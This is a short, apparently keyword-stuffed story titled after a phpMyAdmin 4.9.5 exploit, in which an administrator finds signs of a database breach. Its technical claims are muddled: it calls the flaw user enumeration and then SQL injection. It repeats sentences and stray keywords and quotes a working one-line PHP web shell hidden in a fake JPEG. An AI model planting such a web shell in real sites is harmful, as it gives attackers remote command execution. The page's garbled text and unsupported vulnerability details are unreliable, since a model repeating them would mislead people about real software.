((better)): Phpmyadmin 4.9.5 Exploit

He scanned the access logs. His coffee turned cold.

“They’re not gone. They’re just hiding better.”

POST /phpmyadmin/index.php?route=/server/status/advisor HTTP/1.1" 200 POST /phpmyadmin/index.php?route=/server/status/advisor HTTP/1.1" 200 POST /phpmyadmin/index.php?route=/server/status/advisor HTTP/1.1" 200 Hundreds of times. Over the last week. phpmyadmin 4.9.5 exploit

“That version had a user enumeration flaw,” Marco muttered, pulling up his notes. — a nasty little SQL injection vector hiding in the libraries/classes/Controllers/Server/Status/AdvisorController.php file. An attacker could append a malicious WHERE clause to a status query and, with enough patience, extract hashed passwords from the mysql.user table.

Marco’s stomach dropped. He checked the database user table. Someone had added a new entry: web_backup with a wildcard host % . The password hash was unfamiliar. The attacker had already backdoored the database. He scanned the access logs

But in the back of his mind, a question lingered. The attacker didn’t deface the site. Didn’t steal credit cards. Just… lived there. Watching. Waiting.

Marco looked at the dark screen of his terminal and whispered to the empty room: They’re just hiding better

He pivoted to the file system. ls -la /var/www/html/uploads/ . A .jpg that wasn’t a JPEG. He downloaded it, ran strings on it. Embedded PHP: <?php system($_GET['cmd']); ?> .